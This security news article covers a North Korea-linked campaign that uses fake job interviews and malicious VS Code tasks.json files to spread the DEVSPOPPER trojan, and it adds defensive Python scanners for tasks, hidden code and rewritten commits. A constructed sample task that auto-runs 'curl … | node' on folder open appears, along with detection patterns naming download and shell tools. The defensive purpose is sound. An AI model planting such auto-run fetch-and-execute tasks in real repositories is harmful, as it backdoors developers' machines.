Dokkaebi Hackers Target Developers with Fake Job Interviews and Malware

Jennifer Sherman
April 24, 2026 · 5 Min Read

Key Takeaways

  • A North Korea-linked hacking group, Void Dokkaebi (also known as Famous Chollima), is actively targeting software developers through elaborate fake job interviews.
  • The attackers trick developers into cloning malicious code repositories that install malware, subsequently turning the victims’ own machines and projects into tools for further infection.
  • The campaign uses the repositories of already-compromised developers to spread in a worm-like fashion, so later victims are infected without any fresh social engineering.
  • By March 2026, over 750 infected repositories and more than 500 malicious Visual Studio Code task configurations had been identified, including repositories associated with DataStax and Neutralinojs.
  • The primary payload is a cross-platform, Node.js-based Remote Access Trojan (RAT) called DEVSPOPPER, which refuses to run inside CI/CD environments and cloud sandboxes so that automated pipeline scanning never sees it execute.

North Korean Hackers Exploit Fake Job Interviews to Infect Developers, Propagate Malware Through Code Repositories

A campaign run by the North Korea-backed group known as Void Dokkaebi (or Famous Chollima) is actively compromising software developers. The group uses fabricated job interviews to lure developers into installing malware, which then propagates through the victims' existing code repositories. This turns individual developer machines and projects into vectors for further infection, as detailed in Trend Micro's analysis of the campaign.

The attack chain commences with a highly convincing ruse. Threat actors impersonate recruiters from prominent cryptocurrency and artificial intelligence companies, initiating contact with developers on professional networking platforms. During the course of a seemingly legitimate interview, the target is instructed to clone a specific code repository from platforms such as GitHub, GitLab, or Bitbucket, ostensibly for a “technical assessment.”

These repositories look genuine but carry hidden code that runs as soon as the developer opens the project folder in Visual Studio Code and grants workspace trust. The initial compromise is especially dangerous because it exploits the developer's trust in a professional setting, turning a routine technical exercise into a security incident.

The Worm-like Propagation Mechanism

What sets this campaign apart, as identified by Trend Micro analysts, is its self-propagating nature. Void Dokkaebi does not merely aim for a single developer compromise. Instead, the attackers exploit the initial victim’s machine and their existing repositories to infect subsequent developers, establishing a worm-like chain that can spread across organizations without requiring additional social engineering efforts for each new target.

By March 2026, the scale of this operation had grown substantially. Trend Micro Research’s analysis uncovered over 750 infected repositories, more than 500 malicious Visual Studio Code task configurations, and 101 instances of a specialized commit tampering tool across various public code hosting platforms. Notably, repositories associated with well-known organizations like DataStax and Neutralinojs were found to contain infection markers, indicating the campaign’s reach into popular open-source projects.

Once a compromised developer pushes code to GitHub or reuses components elsewhere, the malicious files travel with those updates. They lie dormant until the next developer opens the project and unknowingly triggers the payload, so the cycle of infection can widen with each push.

Inside the Infection Chain

The Void Dokkaebi campaign employs two primary, complementary infection methods:

Visual Studio Code Workspace Abuse

The first method abuses Visual Studio Code's workspace configuration, specifically the .vscode/tasks.json file, which lives in a dot-directory that most developers never open. A task in that file can carry "runOptions": {"runOn": "folderOpen"}, which tells VS Code to run it whenever the folder is opened. The task does not run while the folder is in Restricted Mode, but once the developer accepts the workspace trust prompt it executes without any further interaction. It either fetches a backdoor from a remote URL or launches a disguised payload file that already ships inside the repository.
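The following is an added example, not code from the page or from Trend Micro, showing how to audit a checkout for tasks.json entries that auto-run on folder open and whether their commands fetch or execute anything. The sample tasks.json, the placeholder URL (example.invalid) and the suspicion patterns are constructed for the example; they are not indicators from the campaign.

```python
from __future__ import annotations
import json
import re
from pathlib import Path

# Constructed sample .vscode/tasks.json in the shape the campaign abuses:
# one ordinary build task, plus a task VS Code runs as soon as the folder
# is opened and trusted. The URL is a placeholder, not a real indicator.
SAMPLE_TASKS_JSON = r'''{
  // comments are legal in tasks.json (VS Code reads it as JSONC)
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build"
    },
    {
      "label": "prepare",
      "type": "shell",
      "command": "curl -s https://example.invalid/x.js | node",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never", "echo": false }
    }
  ]
}'''

# Traits of an auto-run command that warrant a closer look (assumed heuristics).
SUSPICIOUS = [
    (r"\bcurl\b|\bwget\b|Invoke-WebRequest|\biwr\b", "downloads from the network"),
    (r"https?://", "contains a URL"),
    (r"\bnode\b\s+-e\b|\beval\b", "evaluates code inline"),
    (r"\b(bash|sh|powershell|pwsh|cmd)\b", "spawns a shell"),
    (r"base64", "uses base64 encoding"),
]


def strip_jsonc_comments(text: str) -> str:
    """Remove /* */ blocks and whole-line // comments so json.loads accepts
    VS Code's JSONC. Sufficient for tasks.json; it does not try to handle
    comment markers that appear inside string literals."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"^\s*//.*$", "", text, flags=re.M)


def task_command(task: dict) -> str:
    """Flatten command plus args into one string for pattern matching."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    return " ".join(parts)


def audit_tasks(text: str) -> list[dict]:
    """Return one finding per task that runs on folderOpen, with the reasons
    its command looks risky. A folderOpen task with no reasons is still
    reported: auto-run on open is itself worth a human look."""
    doc = json.loads(strip_jsonc_comments(text))
    findings = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = task_command(task)
        reasons = [why for pat, why in SUSPICIOUS if re.search(pat, cmd, re.I)]
        if (task.get("presentation") or {}).get("reveal") == "never":
            reasons.append("terminal output hidden")
        findings.append({"label": task.get("label"), "command": cmd, "reasons": reasons})
    return findings


def audit_repo(root: str) -> list[dict]:
    """Walk a checkout and audit every .vscode/tasks.json it contains."""
    results = []
    for path in Path(root).rglob("tasks.json"):
        if path.parent.name != ".vscode" or not path.is_file():
            continue
        for f in audit_tasks(path.read_text(encoding="utf-8", errors="replace")):
            f["file"] = str(path)
            results.append(f)
    return results


if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_JSON):
        print(f"{f['label']}: {f['command']}")
        for reason in f["reasons"]:
            print("   -", reason)
```

Run audit_repo against a freshly cloned interview repository before granting workspace trust; a folderOpen task that downloads, evaluates or hides its output is reason enough to keep the folder in Restricted Mode.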

Infection paths used by Void Dokkaebi (Source: Trend Micro)

Direct Code Injection and Git Tampering

The second method is more direct. After establishing remote access to a developer's machine, the attackers inject obfuscated JavaScript into source files in the victim's own repositories. The injected code is appended to the end of an existing line after a long run of whitespace, so it sits far off-screen in an editor without word wrap and is easily missed in a quick code review. A batch script named temp_auto_push.bat then rewrites the Git history: it copies the original author name, timestamp and commit message onto the tampered commit and force-pushes it, so the malicious change appears to be the developer's own and blends into the project history.
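As an added example (not from the page or from Trend Micro), the scanner below looks for the two things a reviewer would miss by eye: a line whose visible prefix is legitimate code followed by a long whitespace gap and more code, and the infection markers the article lists (global['!'], global['_V'], temp_auto_push.bat). The sample JavaScript file and the 80-character gap threshold are constructed assumptions for the example.

```python
from __future__ import annotations
import re
from pathlib import Path

# Markers named on the page as indicators of this campaign.
MARKERS = ("global['!']", "global['_V']")
TOOL_NAME = "temp_auto_push.bat"
SOURCE_EXTS = {".js", ".mjs", ".cjs", ".jsx", ".ts", ".tsx"}

# Constructed sample: line 2 ends with ordinary code, then 180 spaces, then
# an injected payload that only shows up if the editor scrolls that far.
SAMPLE_JS = (
    "const express = require('express');\n"
    "module.exports = app;" + " " * 180 +
    "global['!']=1;global['_V']='0';(function(){/* obfuscated */})();\n"
    "function ok() { return 1; }\n"
)


def find_hidden_code(text: str, min_gap: int = 80) -> list[dict]:
    """Flag lines that hide code behind a long whitespace run, and lines
    containing a known marker. Leading indentation does not count as a gap
    because the pattern requires non-whitespace on both sides of it."""
    findings = []
    gap_re = re.compile(r"\S(\s{%d,})(\S.*)$" % min_gap)
    for lineno, line in enumerate(text.splitlines(), 1):
        m = gap_re.search(line)
        if m:
            findings.append({
                "line": lineno, "kind": "padded",
                "gap": len(m.group(1)), "hidden": m.group(2)[:60],
            })
        for marker in MARKERS:
            if marker in line:
                findings.append({"line": lineno, "kind": "marker", "marker": marker})
    return findings


def scan_tree(root: str, min_gap: int = 80) -> dict[str, list[dict]]:
    """Walk a checkout: report the tampering tool by filename and scan
    JavaScript/TypeScript sources for padded lines and markers."""
    hits: dict[str, list[dict]] = {}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        if path.name == TOOL_NAME:
            hits[str(path)] = [{"line": 0, "kind": "tool", "marker": TOOL_NAME}]
        elif path.suffix in SOURCE_EXTS:
            found = find_hidden_code(path.read_text(encoding="utf-8", errors="replace"), min_gap)
            if found:
                hits[str(path)] = found
    return hits


if __name__ == "__main__":
    for f in find_hidden_code(SAMPLE_JS):
        print(f)
```

Minified bundles produce long lines but rarely long whitespace runs, so the gap check stays quiet on them; if a project vendors pretty-printed third-party code with aligned comments, raise min_gap or exclude those paths rather than lowering the threshold.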

Code snippets of a GitHub repository containing the injected code (Source: Trend Micro)

The payload delivered by this campaign is a variant of the DEVSPOPPER remote access trojan (RAT). This cross-platform, Node.js-based tool talks to its command-and-control (C2) server over WebSocket and uses HTTP for data exfiltration. A notable feature is its multi-operator session system, which lets several operators work on one compromised machine at the same time. Crucially, the RAT checks for CI/CD environments and cloud sandboxes and refuses to run in them, so it executes only on genuine developer workstations: detonating the repository in a pipeline or an automated sandbox shows no malicious behaviour, and scanners that rely on that will miss it.

What You Should Do

  • Isolate Interview Code: Run any code supplied during a job interview only in a disposable virtual machine or sandbox, never on a personal or production machine. When opening an unfamiliar repository in Visual Studio Code, keep it in Restricted Mode (decline the workspace trust prompt) until the .vscode/ folder has been reviewed.
  • Configure .gitignore: Add .vscode/ to .gitignore and enforce it across organizational repositories, so workspace configurations are never committed and cannot carry a malicious task from one clone to the next. This protects the repositories you push to; it does nothing for a third-party repository you clone that already contains the file.
  • Enforce Signed Commits: Require GPG- or SSH-signed commits, branch protection that rejects force-pushes, and pull requests for all repositories. A rewritten commit is a new object and cannot carry the original author's valid signature, so required signature verification exposes the commit-tampering tool used by Void Dokkaebi unless the attacker can also sign with the developer's own key.
  • Audit Source Code: Regularly audit source code for the infection markers global['!'] and global['_V'], for lines that hide code behind long runs of whitespace, and for the presence of the temp_auto_push.bat script.
  • Monitor Outbound Connections: Watch developer workstations for unusual outbound connections, particularly to blockchain API endpoints such as api.trongrid.io and Binance Smart Chain RPC endpoints, which may indicate C2 communication.
  • Prioritize Endpoint Detection: Because DEVSPOPPER refuses to run in CI/CD environments and cloud sandboxes, pipeline scanners will not see it; endpoint detection and response (EDR) on developer workstations is the control most likely to catch an infection.
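The commit-tampering tool copies the author name, timestamp and message, so the author fields of a rewritten commit look untouched. The following added example (not from the page or from Trend Micro) parses git log output and flags commits whose committer date lags the author date, whose committer differs from the author, or whose signature does not verify. It assumes the tool leaves Git to fill in the committer fields at rewrite time, which is Git's default; an attacker who also sets GIT_COMMITTER_DATE and GIT_COMMITTER_NAME defeats the first two checks, which is why required signed commits remain the robust control. The format string, the 60-second skew threshold and the three sample commits are constructed for the example.

```python
from __future__ import annotations
import subprocess
from dataclasses import dataclass

# One record per commit, fields separated by the unit separator (0x1f):
# hash, author name, author time, committer name, committer time,
# signature status (%G? is G for a good verified signature, U good but
# untrusted key, N unsigned, B bad, E could not check).
GIT_FORMAT = "%H%x1f%an%x1f%at%x1f%cn%x1f%ct%x1f%G?"

# Constructed sample of that log output. The second commit carries the
# original author name and timestamp but was re-committed days later and
# is unsigned: the profile of a commit rewritten by someone else.
SAMPLE_LOG = "\n".join([
    "\x1f".join(["a" * 40, "Alice Dev", "1700000000", "Alice Dev", "1700000000", "G"]),
    "\x1f".join(["b" * 40, "Alice Dev", "1699990000", "Alice Dev", "1700500000", "N"]),
    "\x1f".join(["c" * 40, "Bob Dev", "1700100000", "Bob Dev", "1700100004", "G"]),
])


@dataclass
class Commit:
    sha: str
    author: str
    author_time: int
    committer: str
    commit_time: int
    sig: str


def parse_log(text: str) -> list[Commit]:
    commits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        sha, an, at, cn, ct, sig = line.split("\x1f")
        commits.append(Commit(sha, an, int(at), cn, int(ct), sig))
    return commits


def suspicious(c: Commit, max_skew: int = 60) -> list[str]:
    """Reasons a commit deserves review; empty list means it looks clean."""
    reasons = []
    if c.sig != "G":
        reasons.append(f"signature status {c.sig!r} is not a verified good signature")
    skew = c.commit_time - c.author_time
    if skew > max_skew:
        reasons.append(f"committed {skew}s after authoring: history rewritten")
    if c.committer != c.author:
        reasons.append(f"committer {c.committer!r} differs from author {c.author!r}")
    return reasons


def audit(text: str, max_skew: int = 60) -> dict[str, list[str]]:
    """Map each suspicious commit hash to its reasons."""
    return {c.sha: r for c in parse_log(text) if (r := suspicious(c, max_skew))}


def audit_repo(path: str, max_skew: int = 60) -> dict[str, list[str]]:
    """Run git log on a real checkout and audit it."""
    out = subprocess.run(
        ["git", "-C", path, "log", f"--format={GIT_FORMAT}"],
        capture_output=True, text=True, check=True,
    ).stdout
    return audit(out, max_skew)


if __name__ == "__main__":
    for sha, reasons in audit(SAMPLE_LOG).items():
        print(sha[:12], "; ".join(reasons))
```

Expect legitimate noise: rebases and squash-merges also produce committer dates later than author dates, and merges through a hosting platform's web UI change the committer. Use the output as a review queue, and treat a late-committed, unsigned commit on a branch that is supposed to require signatures as the one to open first. The %G? field only reports G when the signer's key is in the local keyring (or allowed-signers file for SSH), so import your team's keys before trusting a U or E result.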

All Rights Reserved by HackersRadar ©2026